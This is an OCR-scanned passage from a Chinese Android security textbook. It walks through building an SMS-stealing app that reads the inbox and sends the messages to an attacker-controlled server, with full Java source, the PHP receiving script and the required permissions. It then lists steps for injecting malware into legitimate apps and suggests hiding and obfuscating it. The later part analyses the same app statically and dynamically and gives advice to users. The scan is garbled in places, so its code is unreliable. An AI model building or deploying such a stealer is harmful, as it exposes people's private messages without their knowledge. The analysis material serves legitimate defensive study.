int index = cursor.getColumniIndex ("body"); 
while (cursor.moveToNext () ) { 
sms += "From :" + cursor.getString(2) + ":" + 
cursor.getString(index) + "\n"; 


} 


O 读 取 短 信 后 ， 将 读 到 的 值 通过 下 面 的 代码 以 简单 的 键 值 对 的 形式 添加 到 ArrayList 对 
象 中 。 


arrayList.add(new BasicNameValuePair("sms", sms) ) ; 

口 最 后 ， 以 ArrayList 对 象 作 为 参数 调用 uploadData () 方 法 ， 如 下 所 示 。 
uploadData (arrayList); 

e 编写 uploadData() 方 法 

下 面 这 段 代码 会 将 短信 发 送 到 受 攻 击 者 控制 的 服务 器 。 


private void uploadData(ArrayList<BasicNameValuePair> arrayList) { 








DefaultHttpClient httpClient = new DefaultHttpClient(); 


HttpPost httpPost = new 
HttpPost ("http://10.1.1.4/smartstealer/sms.php") ; 


try { 
httpPost.setEntity (new UrlEncodedFormEntity (arrayList) ); 
httpClient.execute(httpPost) ; 


} catch (Exception e) { 





e.printStackTrace(); 
} 
i 

} 


下 面 逐 行 解读 以 上 代码 。 
口 首先 ， 创建 一 个 DefaultHttpClient 对 象 。 SI 


DefaultHttpClient httpClient = new DefaultHttpClient(); 


O 然后 创建 一 个 HttpPost 对 象 ,并 指定 目标 服务 器 的 网 址 .本 例 使 用 http:/10.1.1.4/smartstealer/ 
sms.php。 稍 后 将 给 出 sms.php 的 代码 。 
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口 接着 , 需要 构建 发 送 至 服务 器 的 post 的 参数 。 在 本 例 中 ,唯一 要 发 送 的 参数 就 是 短信 和 键 值 
对 ， 而 它 已 经 作为 参数 传递 给 uploadData() 方 法 。 


httpPost.setEntity (new UrlEncodedFormEntity(arrayList) ); 
O 最 后 ， 通 过 下 面 的 代码 执行 HTTP 请 求 。 


httpClient.execute(httpPost) ; 





e MainActivity.java 的 完整 代码 
下 面 是 MainActivity.class 文 件 的 完整 代码 。 


package com.androidpentesting.smartstealer; 





import android.app.Activity; 

import android.database.Cursor; 

import android.net.Uri; 

import android.os.Bundle; 

import android.view.View; 

import android.widget.Button; 

import org.apache.http.client.entity.UrlEncodedFormEntity; 
import org.apache.http.client.methods.HttpPost; 
import org.apache.http.impl.client.DefaultHttpClient; 
import org.apache.http.message.BasicNameValuePair; 
import java.util.ArrayList; 


public class MainActivity extends Activity { 
Button btn; 
String sms = 1E; 


ArrayList<BasicNameValuePair> arrayList = new 
ArrayList<BasicNameValuePair>()j; 


@Override 

protected void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState) ; 
setContentView(R.layout.activity_main) ; 


btn = (Button) findViewById(R.id.btnStart) ; 


btn.setOnClickListener (new View.OnClickListener() { 
@Override 
public void onClick(View v) { 
Thread thread = new Thread() { 


@Override 
public void run() { 
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Uri uri = Uri.parse("content://sms/inbox") ; 


Cursor cursor = 


getContentResolver().query(uri, null, null, null, null); 


int index = cursor.getColumniIndex ("body"); 


while (cursor.moveToNext()) { 


sms += "From :" + cursor.getString(2) + ":" + 


ee 


cursor.getString(index) + "\n"; 


arrayList.add(new BasicNameValuePair("sms", sms)); 
uploadData(arrayList); 


} 


thread.start(); 


private void uploadData(ArrayList<BasicNameValuePair> arrayList) { 


DefaultHttpClient httpClient = new DefaultHttpClient(); 


HttpPost h 
HttpPost 


try { 
http 


ttpPost = new 
("http://10.1.1.4/smartstealer/sms.php") ; 


Post.setEntity (new UrlEncodedFormEntity(arrayList)); 


httpClient.execute(httpPost) ; 


p cate 


e.prin 


} 
2. 注册 权限 


h (Exception e) { 





tStackTrace(); 





由 于 应 用 需要 读 取 短 信和 进行 网 络 连接 ， 因 此 我 们 需要 在 AndroidManifestxml 文 件 中 添加 下 


面 的 权限 。 


<uses-permission android:name="android.permission.INTERNET"></uses- 


permission> 


<uses-permission android:name="android.permission.READ_SMS"></uses- 


permission> 


在 AndroidManifest.xml 文 件 中 添加 上 面 的 权限 后 的 代码 如 下 所 示 。 
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<?xml version="1.0" encoding="utf-8"?> 
<manifest xmlns:android="http://schemas.android.com/apk/res/android" 
package="com.androidpentesting.smartstealer"> 


<uses-permission 
android:name="android.permission. INTERNET"></uses-permission> 
<uses-permission 
android:name="android.permission.READ_SMS"></uses-permission> 


<application 
android:allowBackup="true" 
android: icon="@drawable/ic_launcher" 
android: label="@string/app_name" 
android: theme="@style/AppTheme"> 
<activity 
android:name=".MainActivity" 
android: label="@string/app_name"> 
<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 


<category android:name 
="android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
</application> 


</manifest> 


3. 服务 器 代码 
在 前 文中 ， 我 们 通过 下 面 的 链接 发 送 短信 内 容 : http://10.0.0.31/smartstealer/sms.php。 


ME, 我 们 需要 编写 服务 器 接收 短信 的 代码 。 简 单 地 说 ,我 们 现在 看 到 的 是 托管 在 攻击 者 服 
务 器 上 的 sms.php 文 件 的 代码 。 


下 面 是 sms.php 文 件 的 完整 代码 。 


<?php 






































Ssms = $_POST["sms"]; 

Sfile = "sms.txt"; 

Sfp =fopen(Sfile,"a") or die("coudnt open"); 
fwrite(Sfp,$sms) or die("coudnt"); 
die("success!"); 

Eclose($fp); 


TS 
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O 从 上 述 代码 中 可 以 看 到 ， 我 们 将 post 的 数据 保存 在 $Ssms 变 量 中 ; 
口 然后 ， 我 们 使 用 fopen () 以 追加 模式 打开 sms.txt 文 件 ; 

口 接 下 来 ， 使 用 fwrite () 将 数据 写 人 smas.txt 文 件 中 ; 

口 最 后 ， 使 用 fclose () 关 闭 文件 。 





























现在 ， 如 果 你 在 模拟 器 或 是 真 机 中 启动 应 用 ,并 点 击 Start the Game 按 钮 ， 你 会 在 攻击 者 服务 
器 上 看 到 设备 收 件 箱 中 的 所 有 短信 内 容 。 








< C | D localhost/smartstealer/sms.txt 





From :bit.ly:???? ????? ?? ????!MyAirtel App ?????? ???????? ????????? ????? 24 
http://bit.ly/airtel5 

From :AA-650033:R.Balki's ?????? ??????????????"Ki ???? Ka" ???? ????? ??????? 
From :AA-650011:??96=1GB 2G, 28 ??????. 

??169=1GB 3G, 28 ??????. ???? ????, ???? *121*l#. ???????? ????????? ??, 222724 
From :AD-AIRMTA:Recharge done on 13-Mar-16 08:29 PM,MRP:Rs30.00,PF:3.00,STax:Rg 
From :AA-mydala:Dear Customer, your voucher no. for Amazon is Pace ar 
is valid on this landing page amzn.to/1UeUPGx. The voucher is valid till 2016- 
From :AD-AIRMTA:Recharge Successful on datetime#,MRP:RsS38.00,PF:32.19,Revised 
STax:Rs4.81,Talktime:Rs1.00,Balance:Rs14.71,TransID:160313465866,Benefit:RC38 q 











为 了 让 你 知道 在 安 卓 系统 中 使 用 自 带 的 API 开 发 恶意 软件 有 多 么 容易 ， 我们 
| 介绍 了 通过 简单 的 方式 使 用 activity 和 点 击 按钮 进行 恶意 任务 等 概念 ,你 可 以 尝试 
Q 添加 广播 接收 器 ,并 结合 服务 , 在 用 户 完全 不 知情 的 情况 下 在 后 台 静 默 执行 这 些 
恶意 功能 ,开发 危险 的 恶意 软件 的 能 力 完 全 取决 于 你 的 想象 力 和 编码 技术 ,此 外 ， 
通过 对 代码 进行 混淆 可 以 使 恶意 软件 分 析 专 家 更 加 难以 进行 静态 分 析 。 


4. 感染 合法 应 用 的 提示 





恶意 应 用 很 容易 修改 和 感染 原始 安 卓 应 用 。 通 过 下 面 的 步骤 可 以 达到 这 个 目的 : 
(1) 使 用 apktool 工 具 得 到 原始 应 用 和 恶意 应 用 的 smali 代 码 ; 

(2) 将 恶意 应 用 的 smali 文 件 添加 到 原始 应 用 smali 文 件 夹 下 ; 

(3) 将 恶意 应 用 的 所 有 配置 修改 到 原始 应 用 ; 








(4) 将 恶意 应 用 所 需 的 权限 添加 至 原始 应 用 的 AndroidManifest.xml 文 件 中 ; 
(5) 如 果 有 需要 的 话 ， 声 明 诸如 广播 接收 器 、 服 务 等 组 件 ; 

(6) 使 用 apktool 工 具 重 新 打包 原始 应 用 ; 

(7) 使 用 keytool 和 Jarsigner 工 具 对 新 生成 的 APK 文 件 进行 签名 ; 

(8) 至 此 ， 你 已 准备 好 已 被 感染 的 应 用 。 
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9.3 恶意 应 用 分 析 


本 贡 将 介绍 如 何 通过 静态 和 动态 分 析 技术 分 析 安 草 亚 意 应 用 。 我 们 将 使 用 现实 中 常用 的 逆向 
工程 技术 和 静态 分 析 的 方法 来 分 析 恶 意 应 用 。 oani 用 进行 动态 分 析 ， 它 能 查看 
应 用 的 网 络 调用 。 我们 也 可 以 使 用 introspy 之 类 的 工具 来 捕获 应 用 其 他 敏感 API 的 调用 。 这 一 部 分 
将 介绍 前 面 使 用 过 的 短信 和 穷 取 应 用 的 分 析 过 程 。 


















































9.3.1 静态 分 析 


首先 ,使 用 逆向 工程 技术 进行 静态 分 析 。 当 对 应 用 的 恶意 行为 进行 分 析 时 ， 如 果 能 访问 应 用 
的 源 代码 将 会 使 分 析 过 程 变 得 更 加 简单 。 


1. 使 用 Apktool 拆 解 安 卓 应 用 

我 们 可 以 使 用 Apktool 来 拆 解 应 用 ， 并 获得 应 用 的 smali 代 码 。 
下 面 是 具体 的 操作 步 又 。 

(1) 导航 到 应 用 位 置 


$ pwd 
/Users/srini0x00/Desktop/malware-analysis 


$ 









































$ ls SmartStealer.apk 
SmartStealer.apk 
$ 


从 上 述 代码 中 能 看 到 ，SmartStealer.apk 文 件 在 当前 工作 目录 中 。 
(2) 运行 下 面 的 命令 可 以 得 到 应 用 的 smali 代 码 


Java -jar apktool_2.0.3.jar d [应 用 ] .apk 


(3) 下 面 的 代码 显示 了 使 用 Apktool 拆 解 应 用 的 过 程 











$ java -jar apktool_2.0.3.jar d SmartStealer.apk 

I: Using Apktool 2.0.3 on SmartStealer.apk 

I: Loading resource table... 

I: Decoding AndroidManifest.xml with resources... 

I: Loading resource table from file: /Users/srini0x00/Library/ 
apktool/framework/1.apk 

I: Regular manifest package. 

I: Decoding file-resources. 

I: Decoding values */* XMLs... 
I: Baksmaling classes.dex... 
I: Copying assets and libs... 





I: Copying unknown files... 
I: Copying original files... 


$ 
(4) 查看 文件 夹 中 创建 的 文件 


$ ls 
AndroidManifest.xml apktool.yml original res smali 


$ 


从 上 面 的 代码 中 能 看 到 ， 我 们 已 经 创建 了 一 些 文件 和 文件 夹 。AndroidManifest.xml 文 件 和 
smali 文 件 夹 就 是 我 们 要 找 的 。 


o 浏览 AndroidManifest.xml 文 件 


在 进行 恶意 软件 分 析 时 ， 浏 览 AndroidManifest.xml 文 件 通 常 能 找到 大 量 信息 。 由 于 移动 设备 
对 敏感 API 的 访问 有 严格 限制 ， 开 发 者 如 果 想 通过 应 用 访问 敏感 API， 就 需要 声明 权限 。 这 对 恶 
意 软 件 开发 者 来 说 也 不 例外 。 如 果 应 用 需要 访问 短信 ， 就 需要 在 AndroidManifestxml 文 件 中 声明 
READ_SMS 权 限 。 类 似 地 ， 进 行 任何 敏感 API 的 调用 都 需要 声明 对 应 的 权限 。 我 们 浏览 一 下 从 
SmartStealer.apk 文 件 得 到 的 AndroidManifest.xml 文 件 。 























$ cat AndroidManifest.xml 

<?xml version="1.0" encoding="utf-8" standalone="no"?> 

<manifest xmlns:android="http://schemas.android.com/apk/ 

res/android" package="com.androidpentesting.smartstealer" 

platformBuildVersionCode="21" platformBuildVersionName="5.0.1-1624448"> 
<uses-permission android:name="android.permission. INTERNET" /> 
<uses-permission android:name="android.permission.READ_SMS"/> 
<application android:allowBackup="true" android:debuggable="true" 

android: icon="@drawable/ic_launcher" android:label="@string/app_name" 


android: theme="@style/AppTheme"> 


<activity android: label="@string/app_name" android:name="com. 
androidpentesting.smartstealer.MainActivity"> 


<intent-filter> 
<action android:name="android.intent.action.MAIN"/> 
<category android:name="android.intent.category.LAUNCHER"/> 
</intent-filter> 
</activity> 
</application> 


</manifest> 


$ 
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从 上 面 的 代码 中 可 以 看 到 ， 应 用 请 求 了 下 面 两 个 权限 。 


<uses-permission android:name="android.permission.INTERNET"/> 
<uses-permission android:name="android.permission.READ SMS"/> 


这 个 应 用 仅 有 一 个 activity， 即 Mainactivity， 没 有 服务 和 广播 之 类 的 不 可 见 的 应 用 组 件 。 
o 浏览 smali 文 件 
通过 Apktool 能 得 到 smali 代 码 ，smali 代 码 是 介 于 原始 Java 代 人 码 和 最 终 dex 代 码 中 间 的 版 本 。 虽 


然 它 看 起 来 不 像 是 使 用 Java 之 类 的 高 级 语言 编写 的 代码 , 但 花 上 一 点 时 间 研 究 一 下 也 能 得 到 丰富 
的 成 果 。 


下 面 是 使 用 Apktool 导 出 的 smali 文 件 。 


$ pwd 























/Users/srini0x00/Desktop/malware-analysis/SmartStealer/smali/com/ 
androidpentesting/smartstealer 


$ 

$ 

$ls 

Buildconfig.smali MainActivity.smali R$bool.smali R$drawable.smali 
RS$layout.smali RS$style.smali 

MainActivity$1$1.smali RSanim.smali RScolor.smali RSid.smali 
RS$menu.smali RS$styleable.smali 

MainActivity$1.smali RS$attr.smali R$dimen.smali RSinteger.smali 
RS$string.smali R.smali 

$ 


下 面 的 代码 显示 了 MainActivitysmali 中 的 代码 。 
$ cat MainActivity.smali 


.class public Lcom/androidpentesting/smartstealer/MainActivity; 
.Super Landroid/app/Activity; 
.Source "MainActivity.java" 


# instance fields 
.field arrayList:Ljava/util/ArrayList; 
-annotation system Ldalvik/annotation/Signature; 
value = { 
"Ljava/util/ArrayList", 
mem 
"Lorg/apache/http/message/BasicNameValuePair;", 
spn 
} 
.end annotation 
.end field 


.field btn:Landroid/widget /Button; 
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.field sms:Ljava/lang/String; 


-line 71 
.local v2, "httpClient":Lorg/apache/http/impl/client/ 
DefaultHttpClient; 


new-instance v5, Lorg/apache/http/client/methods/HttpPost; 

move-object v9, v5 

move-object v5, v9 

move-object v6, v9 

const-string v7, "http://10.1.1.4/smartstealer/sms.php" 

invoke-virtual {v3, v4}, Lcom/androidpentesting/smartstealer/ 
MainActivity; ->findViewById (I) Landroid/view/View; 

move-result-object v3 

check-cast v3, Landroid/widget/Button; 


iput-object v3, v2, Lcom/androidpentesting/smartstealer/ 
MainActivity;->btn:Landroid/widget/Button; 





-line 33 
move-object v2, v0 





iget-object v2, v2, Lcom/androidpentesting/smartstealer/ 
MainActivity;->btn:Landroid/widget/Button; 


new-instance v3, Lcom/androidpentesting/smartstealer/ 
MainActivitys1; 





move-object v6, v3 
move-object v3, v6 


move-object v4, v6 





move-object v5, v0 


invoke-direct {v4, v5}, Lcom/androidpentesting/smartstealer/ 
MainActivity$1;-><init>(Lcom/androidpentesting/smartstealer/ 
MainActivity;)V 


invoke-virtual {v2, v3}, Landroid/widget/Button;- 
>setOnClickListener (Landroid/view/ViewSOnClickListener;)V 


.line 65 


return-void 
.end method 


从 上 面 的 代码 中 能 看 到 ， 它 就 是 MainActivityjava 文 件 拆 解 后 的 版 本 。 在 下 一 部 分 中 ， 我 们 
将 研究 获取 Java 代 码 的 技术 ， 在 分 析 过 程 中 Java 代 码 相 对 来 说 更 易 理解 。 


2. 使 用 dex2jar 和 JD-GUI 反 编译 安 卓 应 用 


如 前 文 所 述 ， 在 进行 恶意 软件 分 析 时 ， 道 向 安 卓 应 用 获取 Java 源 代码 相对 会 更 简单 。 我 们 来 
看 一 下 如 何 使 用 下 面 这 两 个 流行 软件 来 获取 Java 代 码 。 


























口 dex2jar 
a JD-GUI 








dex2jar 工 具 可 以 将 DEX 文 件 转换 成 JAR 文 件 。 


一 旦 从 DEX 文 件 生 成 了 JAR 文 件 ， 许 多 传统 的 Java 反 编译 工具 能 够 从 jar 中 获取 Java 文 件 。 
JD-GUI 是 最 常用 的 工具 之 一 。 


我 们 来 对 之 前 的 SmartStealer 应 用 进行 反 编译 ， 并 对 其 进行 分 析 。 
下 面 的 代码 展示 了 如 何 使 dex2jar 工 具 从 DEX 文 件 中 获取 jar 文 件 。 




















$ sh dex2jar.sh SmartStealer.apk 

this cmd is deprecated, use the d2j-dex2jar if possible 
dex2jar version: translator-0.0.9.15 

dex2jar SmartStealer.apk -> SmartStealer dex2jar.jar 
Done. 

$ 


注意 ， 在 上 面 的 代码 中 ， 我 们 使 用 了 一 个 APK 文 件 作 为 输入 ， 而 不 是 classes.dex 文 件 。 我 们 
可 以 选择 上 述 两 种 文件 中 的 任意 一 种 作为 输入 。 当 把 APK 文 件 作 为 输入 时 ,dex2jar 会 从 中 自动 获 
取 classes.dex 文 件 。 可 以 看 到 ， 上 一 步 创 建 了 一 个 新 的 的 jar 文 件 ， 即 SmartStealer_dex2jarjar。 
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现在 , 启动 JD-GUI 工 具 并 用 它 打 开 刚 刚 生 成 的 jar 文 件 。 我 们 就 能 看 到 Java 代 码 , 如 下 图 所 示 。 





e0 Java Decompiler - MainActivity.class 
o egs 


SmartStealer_dex2jarjar © 


4 


4 


> 出 android.support MainActivity.class € 
了  com.androidpentesting.smartsteal 
> [D BuildConfig 


D MainActivity 图 import android.app.Activity; 
>» DR 


package com.androidpentesting. smartstealer; 


public class MainActivity extends Activity 
{ 
ArrayList<BasicNameValuePair> arrayList; 
| | Button btn; 
String sms = ""; 


public MainActivity() 

{ 
ArrayList localArrayList = new ArrayList(); 
this.arrayList = localArrayList; 


} 














下 面 是 反 编 译 出 来 的 代码 中 的 一 段 ， 仔 细 观 察 它 。 


public void run() 
{ 





Uri localUri = Uri.parse("content://sms/inbox"); 
Cursor localCursor = MainActivity.this.getContentResolver().query(localUri, null, null, null, null); 
int i = localCursor.getCoLumnIndex("body"); 
while (localCursor .moveToNext()) 
{ 
StringBuilder LocalStringBuilder = new StringBuilder(); 
MainActivity localMainActivity = MaindActivity. this; 
localMainActivity.sms = (localMainActivity.sms + "From :" + LocalCursor.getString(2) + ":" + localCursor.getString(i)| 
} 
ArrayList localArrayList = MainActivity.this.arrayList; 
BasicNameValuePair localBasicNameValuePair = new BasicNameValuePair("sms", MainActivity. this. sms); 
localArrayList.add(LocalBasicNameValuePair) ; 
MainActivity. this. uploadData(MainActivity.this.arrayList); 























上 面 的 代码 清楚 地 显示 应 用 会 通过 内 容 提供 程序 Uri content://sms/inbox 从 设备 读 取 短信 。 
上 面 代码 的 最 后 一 行 显示 应 用 会 调用 uploadData 方 法 ， 并 向 其 传递 一 个 arrayLiset 对 象 作为 


在 同一 个 Java 文 件 中 搜索 uploadData 方 法 ,会 显示 下 面 的 内 容 。 














private void uploadData(ArrayList<BasicNameValuePair> paramArrayList) 
{ 
DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient(); 
HttpPost localHttpPost = new HttpPost("http://10.1.1.4/smartstealer/sms.php"); 
try 
{ 
UrLEncodedFormEntity LocalUrlEncodedFormEntity = new UrlEncodedFormEntity(paramArrayList); 
LocalHttpPost. setEntity(LocalUrlEncodedFormEntity); 
LocalDefaultHttpClient .execute(LocalHttpPost) ; 
return; 
} 
catch (Exception localException) 
{ 
localException. printStackTrace(); 
} 
} 


这 个 应 用 会 调用 下 面 的 网 址 ， 并 将 从 设备 读 取 的 短信 发 送 到 远程 服务 器 : http://10.1.1.4/ 


smartstealer/sms.php. 

















经 介绍 了 这 个 应 用 是 如 何 一 步 步 开发 的 。 因 此 ,如 果 想 要 了 解 关于 这 个 应 用 更 多 的 技 
术 细 节 ， 请 参考 前 文中 “编写 简单 的 短信 窃取 应 用 ”一 节 。 



































9.3.2 动态 分 析 


使 用 动态 分 析 技 术 是 男 一 种 分 析 安 卓 应 用 的 方法 , 它 包括 运行 应 用 , 并 了 解 应 用 功能 以 及 应 
用 运行 时 的 行为 。 在 源 代码 被 混淆 的 情况 下 ,动态 分 析 很 有 用 。 这 一 部 分 主要 介绍 使 用 主动 和 被 
动 两 种 流量 拦截 技术 来 分 析 安 卓 应 用 的 网 络 流量 。 
1. 使 用 Burp 分 析 HTTP/HTTPS 流 量 


如 果 应 用 与 远程 服务 器 进行 HTTP 连接 ,那么 分 析 它 的 流量 就 很 简单 ， 只 需 使 用 Burp 之 类 的 
代理 工具 对 流量 进行 简单 拦截 即 可 。 下 图 显示 了 用 于 分 析 SmartStealer 应 用 的 代理 的 配置 。 




































































10.0.2.2 这 个 IP 地 址 表示 模拟 器 运行 的 主机 的 IP 地 址 ,Burp 在 主机 运行 的 端口 号 为 8080, 这 里 
也 配置 成 一 样 。 这 个 配置 能 保证 任何 来 自 安 卓 模 拟 器 的 http 流 量 首先 会 经 过 Burp 代 理 。 


现在 ,启动 需要 分 析 的 目标 应 用 ,运行 所 有 界面 ， 如 果 有 按钮 的 话 ， 点 击 所 有 按钮 。 本 例 只 
有 一 个 activity， 在 这 个 acitivity 上 有 一 个 按钮 。 

































































93 恶意 应 用 分 析 233 





点 击 Start the Game 按 钮 ， 就 能 在 Burp 代 理 中 看 到 短信 被 发 送 到 了 服务 器 。 








ome | spiser | a r at 
peer history | WebSockets history | Options 





A) Request to hetp://10.1.1,2:80 


[naw] Params | Headers | Hex | 

POST /smartstealer/sms.php HTTP/1.1 

Content-Length: 86 

Content-Type: application/x-www-form-urlencoded 
Host: 10.1.1.2 

Connection: Keep-Alive 

User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) 


sms =From+%3A78 7656 7898%3AHe110%2C+how+are+you%3F%OAFrom+%3A98 76 7898 76%3AHi+There%21%0A 











从 上 图 中 可 以 看 到 ， 应 用 将 短信 作为 post 的 数据 发 送 到 服务 器 。 


上 面 的 步骤 也 适用 于 HTTPS 流 量 ， 只 不 过 需要 在 安 卓 设备 或 模拟 器 上 安装 
> Burp 的 CA 证 书 。 


2. 使 用 tcpdump 和 Wireshark 分 析 网 络 流量 


前 文 介绍 了 如 何 分 析 http/https 流 量 。 但 是 ， 如 果 应 用 通过 其 他 TCP 端 口 进行 通讯 呢 ? 在 这 种 
情况 下 ， 我 们 可 以 使 用 tcpdump 工 具 被 动 地 拦截 流量 ， 然 后 将 捕获 的 流量 传递 给 像 Wireshark 这 一 
类 工具 ， 并 进一步 分 析 它 。 


下 面 介绍 如 何 使 用 cpdump 和 Wireshark 分 析 同 一 个 目标 应 用 的 网 络 流量 。 
首先 将 tecpdump 的 ARM 二 进 制 文件 推送 到 安 章 设备 ， 如 下 面 的 代码 所 示 。 


$ adb push tcpdump /data/local/tmp 
1684 KB/s (645840 bytes in 0.374s) 
$ 


我 们 将 tcpdump 推 送 到 模拟 器 的 /data/local/tmp/ 文 件 夹 下 。 
我 们 需要 确保 tcpdump 二 进 制 文件 有 可 执行 权限 ， 这 样 才能 在 设备 运行 。 
下 面 的 代码 显示 tcpdump 二 进 制 文件 没有 在 设备 上 可 执行 的 权限 。 


$ adb shell 

root@generic:/ # cd /data/local/tmp 
root@generic:/data/local/tmp # ls -1 tcpdump 

-rw-rw-rw- root root 645840 2015-03-23 02:23 tcpdump 
root@generic:/data/local/tmp # 


我 们 赋予 这 个 二 进 制 文件 可 执行 权限 ， 如 下 面 的 代码 所 示 。 


root@generic:/data/local/tmp # chmod 755 tcpdump 
root@generic:/data/local/tmp # ls -1 tcpdump 
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-rwxr-xr-x root root 645840 2015-03-23 02:23 tcpdump 
root@generic:/data/local/tmp # 


现在 我 们 可 以 通过 下 面 的 命令 来 执行 这 个 tcpdump 二 进 制 文件 。 


./tcpdump -v -s 0 -w [file.pcap] 


O -v: 输出 详细 信息 ; 
-s: 用 于 抽取 指定 的 字 节 数 ; 
O -w: 将 数据 写 和 人 到 文件 。 


root@generic:/data/local/tmp # ./tcpdump -v -s 0 -w traffic.pcap 





tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 
65535 bytes 


Got 75 
从 上 面 的 代码 中 可 以 看 出 ，tcpdump 已 经 开始 捕捉 设备 上 的 数据 包 。 


ME, 启动 目标 应 用 ， 点击 所 有 可 点 的 按钮 ， 并 浏览 所 有 activity。 本 例 的 目标 应 用 仅 有 一 个 
activity， 打 开 应 用 ， 点 击 Start the Game 按 钮 ， 如 下 图 所 示 。 





















































在 浏览 应 用 的 过 程 中 ， 如 果 应 用 连接 了 网 络 ，tcpdump 就 会 捕捉 到 流量 信息 。 
现在 ， 按 下 Ctrl + C 组 合 键 可 以 停止 捕捉 数据 包 。 























root@generic:/data/local/tmp # ./tcpdump -v -s 0 -w traffic.pcap 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 
65535 bytes 

^C558 packets captured 





558 packets received by filter 
0 packets dropped by kernel 
root@generic:/data/local/tmp # 


现在 ， 数 据 包 会 保存 到 设备 上 的 traffic.pcap 文 件 中 。 我 们 可 以 通过 使 用 aab pul1 命 令 将 其 拉 
取 到 计算 机 上 ， 如 下 所 示 。 


$ adb pull /data/ 
1270 KB/s (53248 





local/tmp/traffic.pcap 
bytes in 0.040s) 





$ 
可 以 使 用 Wireshark 之 类 的 工具 打开 pcap 文 件 。 下 图 是 Wireshark 打 开 这 
O©@O4E4 BIXEE QALX 
Filter: | Expression... Clear 
No Time Source Destination Protocol 
1 0.000000 10.0.2.15 10.0.2.2 TCP 
3 0.000401 10.0.2.2 10.0.2.15 TCP 
4 0.000470 10.0.2.15 10.0.2.2 TCP 
5 0.000539 10.6:2:15 10.0.2.2 TCP 
7 0.000669 10.0.2.2 10.0.2.15 TCP 
8 0.003486 10.0:2:15 10.0.2.2 TCP 
9 0.003937 10.0.2.2 19.9.2.15 TCP 
= a o aana ao anaa IGR 





























个 pcap 文 件 后 的 界面 。 


由 于 我 们 的 恶意 应 用 使 用 http 连 接 ， 所 以 ， 我 们 可 以 使 用 Wireshark 中 的 http filter 过 滤 流 量 ， 


如 下 图 所 示 。 














Filter: | http Expression... 
No. Time Source Destination 
446 14.972373 10.1.1.2 10.0.2.15 o 


Protocol 


HTTP 


Clear 





从 上 图 中 能 看 到 , 目标 应 用 向 服务 器 发 送 了 一 个 HTTP POST 请 求 。 点 击 这 





细 信 息 ’ 如 下 图 所 示 。 








Hypertext Transfer Protocol 

» POST /smartstealer/sms.php HITP/1.1\r\n 

» Content-Length: 86\r\n 
Content-Type: application/x-www- form-urlencoded\r\n 
Host: 10.1.1.2\r\n 
Connection: Keep-Alive\r\n 
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)\r\n 
\r\n 
[Full request URI: http://10.1.1.2/smartstealer/sms.php] 
[HTTP request 1/1] 
[Response in frame: 446] 

HTML Form URL Encoded: application/x-www-form-urlencoded 














从 上 图 中 可 以 看 到 ， 




















个 数据 包 


会 显示 详 





应 用 通过 使 用 HTTP POST 请 求 从 设备 将 短信 发 送 给 了 一 个 远程 服务 器 。 
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94 自动 化 分 析 工 具 


有 时 ,手动 进行 分 析 可 能 需要 耗费 比较 长 的 时 间 。 我 们 可 以 选择 多 种 安 卓 应 用 动态 分 析 工 具 。 
如 果 你 想 要 进行 离线 分 析 ，Droidbox 是 最 好 的 选择 。Droidbox 是 一 个 对 安 卓 应 用 进行 动态 分 析 的 
沙 盒 环境 。 还 有 一 些 在 线 分 析 引 擎 的 分 析 效 果 也 不 错 ，SandDroid 就 是 其 中 之 一 。 可 以 访问 
http://sanddroid.xjtu.edu.cn/， 并 上 传 你 的 APK 文 件 进行 动态 分 析 。 

















如 何 避 免 安 卓 恶意 软件 的 威胁 


作为 终端 用 户 ,使 用 安 草 设备 时 必须 小 心 。 从 本 章 中 可 以 看 出 ， 只 需 少量 安 卓 编程 知识 ， 就 
能 开发 出 可 以 造成 极 大 危害 的 安 卓 恶意 软件 。 下 面 是 终端 用 户 避 免 恶 意 软件 威胁 的 一 些 建议 : 


口 始终 从 官方 市 场 安装 应 用 ， 比 如 谷歌 Play 商店 ; 

口 不 盲目 接受 应 用 的 权限 请 求 ; 

口 当 应 用 请 求实 际 需 求 之 外 的 权限 时 要 小 心 ， 比 如 ， 一 个 记事 本 应 用 请 求 READ_SMS 权 限 
就 很 可 疑 ; 

口 当 有 更 新 时 ， 要 及 时 更 新 设备 ; 

O 使 用 杀毒 应 用 ; 

口 尽量 不 要 在 手机 存放 太 多 敏感 信息 。 


















































9.5 ”小结 


本 章 介 绍 了 如 何 编写 一 个 可 以 连接 远程 服务 器 的 简单 恶意 软件 , 并 且 讲 解 了 合法 应 用 是 如 何 
轻易 地 被 恶意 攻击 者 感染 的 。 本 章 还 介绍 了 如 何 使 用 静态 和 动态 分 析 技 术 对 恶意 软件 分 进行 分 
析 。 最 后 ， 我 们 讨论 了 终端 用 户 如 何 避 免 亚 意 软件 的 威胁 。 下 一 章 将 讨论 针对 安 卓 设备 的 攻击 。 









































针对 安 卓 设备 的 攻击 








现在 ,用 户 经 常 通 过 智能 手机 连接 咖啡 店 和 机 场 的 免费 Wi-Fi。 很 多 用 户 也 会 ROOT 安 卓 设 备 ， 
以 便 获 得 更 多 的 功能 。 当 人 们 发 现 安 卓 系统 及 其 组 件 存在 安全 漏洞 时 ,谷歌 公司 就 会 发 布 对 应 的 
更 新 。 本 章 将 介绍 一 些 需要 用 户 注 意 的 最 常用 的 技术 。 首 先 ,我 们 会 介绍 一 些 简单 的 攻击 ， 比 如 
中 间 人 攻击 ， 然 后 再 介绍 其 他 类 型 的 攻击 。 

下 面 是 本 章 将 要 讨论 的 部 分 主要 内 容 。 
口 中 间 人 攻击 
O 来 自 提供 网 络 层 访问 的 应 用 的 威胁 
口 通过 公开 的 漏洞 利用 设备 
口 诸如 绕 过 锁 屏 一 类 的 物理 攻击 




































































10.1 中 间 人 攻击 


由 于 用 户 经 党 连接 公共 Wi-Fi， 中 间 人 攻击 是 针对 移动 设备 最 常见 的 攻击 之 一 。 如 果 能 对 设 
备 发 起 中 间 人 攻击 , 不 仅 导致 在 用 户 连 接 不 安全 的 网 络 时 将 数据 提供 给 攻击 者 , 在 某 些 情况 下 还 
可 能 让 攻击 者 算 改 用 户 的 通讯 数据 并 利用 漏洞 。 WebView 的 addJavaScriptInterface 漏 洞 就 是 一 个 
